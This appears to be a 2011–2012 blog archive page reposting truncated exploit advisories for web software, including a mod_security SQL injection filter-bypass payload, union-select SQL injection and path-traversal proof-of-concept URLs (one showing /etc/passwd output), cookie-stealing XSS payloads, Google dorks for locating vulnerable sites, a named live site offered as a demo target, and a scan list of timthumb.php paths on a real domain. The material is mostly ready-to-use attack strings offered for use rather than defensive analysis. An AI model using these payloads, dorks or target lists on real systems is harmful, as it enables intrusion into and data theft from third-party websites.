# Exploit Title: mod_security 2.6.5 SQL injection bypass. # Date: 21/04/2012 # Author: Phizo # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 —————————————————————- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# Incoming search terms:mod_security [...]
Archive for the ‘Bugs’ Category
Division by zero page.php SQL Injection
April 16th, 2012 
Danis # Exploit Title: Division by zero page.php SQL Injection # Date: 16-April-2012 # Author: Xr0b0t # Software Link: # Version: – # Category:: [Webapps] # Google dork: Division by zero # Tested on: Windows 7 # Demo site: http://create-boutique.co.uk/index.php?page=4 [ bug ] code php : <?php session_start(); include_once(‘includes/db.inc.php’); include_once(‘includes/functions.inc.php’); include_once(‘includes/global.inc.php’); $db = new db(); $mainpages [...]
joomla component (com_ponygallery) SQL injection Vulnerability
April 16th, 2012 Danis ################################################## # Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability # Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2 # Date: 11/04/2012 # Author: xDarkSton3x # E-mail : xdarkston3x@msn.com # Category: webapps # Google dork: inurl:”com_ponygallery” ################################################## [~]Exploit/p0c : http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli] Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] – [ Malandrines Team - DiosdelaRed - RemoteExecution ] [...]
FlexCMS 3.2.1 Multiple CSRF Vulnerabilities
March 17th, 2012 Danis # Exploit Title   : FlexCMS 3.2.1 Multiple CSRF # Date            : 16-03-2012 # Author          : Ivano Binetti (http://www.ivanobinetti.com) # Software link   : http://www.flexcms3.com/index.php/index.html # Vendor site     : http://www.flexcms.com # Version         : 3.2.1 (and lower) # Tested on       : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/flexcms-multiple-csrf-vulnerabilities.html Summary 1)Introduction 2)Vulnerabilities Description 3)Exploit 3.1 Exploit (Change Settings of [...]
Persistent XSS in FLEXCMS 3.2.1
March 17th, 2012 Danis #Software vendor: http://www.flexcms.com/flex/index.html The Persistent XSS appears when any user go to >> edit profile >> Display name >> and then injects the xss code instead of his display name. After inkection this code. In the main page of the webiste, there is “Users Online” menu. This menu is by default in every page of [...]
OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
March 17th, 2012 Danis # Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability # Google Dork: – # Date: 16/03/2012 # Author: mr.pr0n (@_pr0n_) # Homepage: http://ghostinthelab.wordpress.com/ – http://s3cure.gr # Software Link: https://github.com/rocktronica/OneFileCMS # Version: OneFileCMS v.1.1.5 # Tested on: Linux Fedora 14 =============== Description =============== OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management [...]
Sockso <= 1.5 Directory Traversal
March 17th, 2012 Danis ####################################################################### Luigi Auriemma Application:Â Sockso http://sockso.pu-gh.com Versions:Â Â Â Â <= 1.5 Platforms:Â Â Â Windows, Mac, Linux Bug:Â Â Â Â Â Â Â Â Â directory traversal Exploitation: remote Date:Â Â Â Â Â Â Â Â 14 Mar 2012 Author:Â Â Â Â Â Â Luigi Auriemma e-mail: aluigi@autistici.org web:Â Â Â aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From author’s homepage: “Sockso is a free, open-source, personal music host [...]
EDinteractive – SQL Injection Vulnerability
March 15th, 2012 admin 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0 0 \ \ \/\ \/\ \ \ \ [...]
Aloservicos – SQL Injection Vulnerability
March 15th, 2012 admin 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0 0 \ \ \/\ \/\ \ \ \ [...]
asaanCart XSS/LFI Vulnerabilities
March 15th, 2012 admin ______________________________________________________________________________________ # Exploit Title :[asaanCart XSS/LFI Vulnerabilities] # Google Dork  :[intext:"smarty_ajax — AJAX-enabled Smarty plugins"]Or[inurl:"/smarty_ajax/"] # Date         :[14/03/2012] # Author       :[Number 7]~ Twitter:[@TunisianSeven] ~ Blog  :[http://tunisianseven.blogspot.com/] # Tested on    :[Linux] # Software Link :[http://asaancart.wordpress.com/] # Download2    :[http://sourceforge.net/projects/asaancart/] # Version:     :[v-0.9] ______________________________________________________________________________________ The bug is based on smarty_ajax plugin which is included in this script and [...]
TVersity <= 1.9.7 Arbitrary File Download
March 15th, 2012 admin ####################################################################### Luigi Auriemma Application:Â TVersity http://tversity.com Versions:Â Â Â Â <= 1.9.7 Platforms:Â Â Â Windows Bug:Â Â Â Â Â Â Â Â Â arbitrary files downloading Exploitation: remote Date:Â Â Â Â Â Â Â Â 14 Mar 2012 Author:Â Â Â Â Â Â Luigi Auriemma e-mail: aluigi@autistici.org web:Â Â Â aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== TVersity is an home media server. ####################################################################### ====== 2) Bug ====== Possibility [...]
Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities
March 14th, 2012 admin <!– Title: Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities Vendor: Zend Technologies Ltd. Product web page: http://www.zend.com Affected version: Zend Server 5.6.0 *Zend Optimizer+ 4.1 *Zend Code Tracing 1.0 *Zend Data Cache 4.0 *Zend Job Queue 4.0 *Zend Debugger 5.3 *Zend Java Bridge 3.1 Summary: Zend Server is a complete, enterprise-ready Web Application Server [...]
Posted in Bugs 
Tags: directives, Vulnerabilities, Web Application Server, Zend Optimizer, Zend Server, Zend Technologies Ltd 
No Comments »Saman Portal Local File Inclusion Vulnerability
March 14th, 2012 admin =========================================================== [+] Title: [Iranian] Saman portal LFI [+] Date: 2/28/12 [+] Author: TMT [+] Mail: taktaz_m2800[a.t]yahoo.com [+] Type: PHP [+] Vendor or Software Link: http://www.sis-eg.com [+] Customers: http://sis-eg.com/services/customers/ [+] Google dork: inurl:sismodule=user ============================================================ [~] desc: Vuln in modules/sisRapid/pnuserapi.php on line 117 just “../” filtered to prevent LFI but “….//” will work [~] poc: http://www.site.com/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=….//….//….//….//….//….//….//….//….//….//….//….//….//etc/passwd root:x:0:0:root:/root:/bin/bash [...]
Belkatalog CMS— sql injection vulnerability
March 14th, 2012 admin #Title:Belkatalog CMS— sql injection vulnerability #Author:Anonymous #Belkatalog CMS is comercial cms developed by croatian developer J. K. “GaÅ¡o” #and it is vulnerable to sql injection vulnerability #http://site.com/[cms]/index.php?id=m&lnk=’[sql injection here] #there are few examples: http://server/index.php?id=m&lnk=-9999+union+all+select+1,version(),3,4,5,6– ###i btw. momixe kretencino turska govnarska jebem ti sve zivo i mrtvo
Posted in Bugs Tags: Author, btw, cms, croatian, govnarska, Injection, jebem, mrtvo, sql injection, sve, Title, vulnerability No Comments »PHP Address Book 6.2.12 Multiple security vulnerabilities
March 11th, 2012 admin Advisory:Â Â Â Â Â Â PHP Address Book 6.2.12 Multiple security vulnerabilities Advisory ID:Â Â Â Â Â Â Â SSCHADV2012-007 Author:Â Â Â Â Â Â Â Â Stefan Schurtz Affected Software:Â Successfully tested on PHP Address Book 6.2.12 Vendor URL:Â Â Â Â http://sourceforge.net/projects/php-addressbook/ Vendor Status:Â Â Â Â Â informed ========================== Vulnerability Description ========================== PHP Address Book 6.2.12 is prone to multiple XSS and SQL-Injection vulnerabilities ================== PoC-Exploit ================== // (Blind) SQL-Injection http://[target]/addressbook/edit.php?id=[sql-injection] http://[target]/addressbook/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection] http://[target]/addressbook/vcard.php?id=[sql-injection] [...]
Posted in Bugs Tags: Address Book, Affected, Author, book, Credits, References, Security, security vulnerabilities, Software, sql injection, Stefan Schurtz, target, vulnerability, XSS No Comments »MaXe/WordPress TimThumb 1.32 Code Execution
January 23rd, 2012 admin # Exploit Title: WordPress TimThumb Plugin – Remote Code Execution # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin – Remote Code Execution Versions [...]
Posted in Bugs, Dork, Exploit Tags: code, code execution, com, dengan, Execution, Exploit, itu, jauh, Proof, proof of concept, Remote Code Execution, Remote Code Execution Versions, untuk, WordPress, WordPress themes, xFF No Comments »MustLive/Joomla Themes Cross Site Scripting / Denial Of Service
January 23rd, 2012 admin Theme PBV MULTI VirtueMart Theme for component VirtueMart for Joomla: Full path disclosure (WASC-13): http://site/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http:// XSS (WASC-08): http://site/components/com_registration/script/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E Vulnerable to XSS, Full path disclosure, Abuse of Functionality and DoS. Component Handy Photo Album for Joomla: XSS (WASC-08): http://site/components/com_hpalbum/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E Vulnerable to XSS, Full path disclosure, Abuse of Functionality and DoS. untuk kerentanan dalam beberapa tema untuk [...]
Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
January 23rd, 2012 admin # # Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # [...]
TimThumb.php Vulnerability Scans
December 3rd, 2011 admin http://ihir.com/wp-content/themes/TheStyle/timthumb.php http://ihir.com/wp-content/themes/nool/timthumb.php http://ihir.com/wp-content/themes/PersonalPress/timthumb.php http://ihir.com/wp-content/themes/SimplePress/timthumb.php http://ihir.com/wp-content/themes/DeepFocus/timthumb.php http://ihir.com/wp-content/themes/DelicateNews/timthumb.php http://ihir.com/wp-content/themes/Bold/timthumb.php http://ihir.com/wp-content/themes/eStore/timthumb.php http://ihir.com/wp-content/themes/TheProfessional/timthumb.php http://ihir.com/wp-content/themes/OnTheGo/timthumb.php http://ihir.com/wp-content/themes/AskIt/timthumb.php http://ihir.com/wp-content/themes/Nova/timthumb.php http://ihir.com/wp-content/themes/eNews/timthumb.php http://ihir.com/wp-content/themes/eVid/timthumb.php http://ihir.com/wp-content/themes/TheCorporation/timthumb.php http://ihir.com/wp-content/themes/Minimal/timthumb.php http://ihir.com/wp-content/themes/Polished/timthumb.php http://ihir.com/wp-content/themes/MyResume/timthumb.php http://ihir.com/wp-content/themes/TheSource/timthumb.php http://ihir.com/wp-content/themes/StudioBlue/timthumb.php http://ihir.com/wp-content/themes/Wooden/timthumb.php http://ihir.com/wp-content/themes/WhosWho/timthumb.php http://ihir.com/wp-content/themes/Quadro/timthumb.php http://ihir.com/wp-content/themes/Glow/timthumb.php http://ihir.com/wp-content/themes/Modest/timthumb.php http://ihir.com/wp-content/themes/Aggregate/timthumb.php http://ihir.com/wp-content/themes/ArtSee/timthumb.php http://ihir.com/wp-content/themes/versatile/timthumb.php http://ihir.com/wp-content/themes/omni-shop/timthumb.php http://ihir.com/wp-content/themes/manifesto/scripts/timthumb.php http://ihir.com/wp-content/themes/arthem-mod/scripts/timthumb.php http://ihir.com/wp-content/themes/echoes/timthumb.php http://ihir.com/wp-content/themes/Bold4/timthumb.php http://ihir.com/wp-content/themes/primely-theme/scripts/timthumb.php http://ihir.com/wp-content/themes/zenkoreviewRD/scripts/timthumb.php http://ihir.com/wp-content/themes/ElegantEstate/timthumb.php http://ihir.com/wp-content/themes/PersonalPress2/timthumb.php http://ihir.com/wp-content/themes/mypage/scripts/timthumb.php http://ihir.com/wp-content/themes/magazinum/scripts/timthumb.php http://ihir.com/wp-content/themes/pbv_multi/scripts/timthumb.php http://ihir.com/wp-content/themes/photofeature/scripts/timthumb.php http://ihir.com/wp-content/themes/ColdStone/timthumb.php http://ihir.com/wp-content/themes/HMDeepFocus/timthumb.php http://ihir.com/wp-content/themes/EarthlyTouch/timthumb.php http://ihir.com/wp-content/themes/Boutique/timthumb.php http://ihir.com/wp-content/themes/ePhoto/timthumb.php http://ihir.com/wp-content/themes/PureType/timthumb.php http://ihir.com/wp-content/themes/13Floor/timthumb.php http://ihir.com/wp-content/themes/BusinessCard/timthumb.php http://ihir.com/wp-content/themes/CherryTruffle/timthumb.php http://ihir.com/wp-content/themes/Cion/timthumb.php http://ihir.com/wp-content/themes/DailyNotes/timthumb.php http://ihir.com/wp-content/themes/eGallery/timthumb.php http://ihir.com/wp-content/themes/eGamer/timthumb.php http://ihir.com/wp-content/themes/GrungeMag/timthumb.php [...]
php video script SQL Injection Vulnerability
November 29th, 2011 admin ###################################################### # Exploit Title: php video script SQL Injection Vulnerability # Date: 2011-25-11 # Author: longrifle0x # Home page: www.security-research.ge # software: PHP video script # Download:http://www.alurian.com/php-video-script/ # Tools: SQLMAP # Drok: Copyright � PHP Video Script powered by Prismotube All Rights Reserved ###################################################### *DESCRIPTION Discovered a vulnerability in video_tags, vulnerability is SQL injection. *Exploitation* [...]
Posted in Bugs Tags: Author, Date, Drok, Exploit, Injection, link, page, php, Software, sql injection, video script, vulnerability, www No Comments »
